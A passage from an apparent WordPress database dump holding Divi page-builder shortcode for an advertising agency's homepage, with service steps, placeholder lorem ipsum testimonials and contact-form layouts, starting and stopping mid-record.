make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\"]<h2><span>Easy to start</span></h2>\n[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>\n[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\" saved_specialty_column_type=\"1_2\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\" saved_specialty_column_type=\"1_2\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\" saved_specialty_column_type=\"1_2\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\" saved_specialty_column_type=\"1_2\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-5-1.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" alt=\"digital marketing agency\" title_text=\"digital-marketing-agency\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\" hover_enabled=\"0\"]<p>Best Advertising Is Done By Satisfied Customers. We Believe &amp; Nurture It In Our Business.</p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" hover_enabled=\"0\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home New','','inherit','closed','closed','','564-revision-v1','','','2020-08-07 20:29:56','2020-08-07 20:29:56','',564,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/564-revision-v1/',0,'revision','',0),(629,1,'2020-08-07 20:31:20','2020-08-07 20:31:20','[et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\" template_type=\"row\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" fullwidth_field=\"on\" _builder_version=\"4.5.2\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row]','Form Footer whatthehell.co','','publish','closed','closed','','form-footer-whatthehell-co','','','2020-08-07 20:31:20','2020-08-07 20:31:20','',0,'https://wthtest1.in8.cdn-alpha.com/et_pb_layout/form-footer-whatthehell-co/',0,'et_pb_layout','',0),(630,1,'2020-08-07 20:32:25','2020-08-07 20:32:25','[et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\" hover_enabled=\"0\" template_type=\"row\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" fullwidth_field=\"on\" _builder_version=\"4.5.2\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row]','Form WTH','','publish','closed','closed','','form-wth','','','2020-08-07 20:32:25','2020-08-07 20:32:25','',0,'https://wthtest1.in8.cdn-alpha.com/et_pb_layout/form-wth/',0,'et_pb_layout','',0),(631,1,'2020-08-07 20:34:28','2020-08-07 20:34:28','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\" hover_enabled=\"0\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/banner.jpg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px|\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" hover_enabled=\"0\" make_fullwidth=\"on\" alt=\"Main Banner WhatTheHell?\" title_text=\"main banner \"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" global_module=\"569\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>\n[/et_pb_text][et_pb_button button_text=\"Learn More\" _builder_version=\"4.5.2\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" 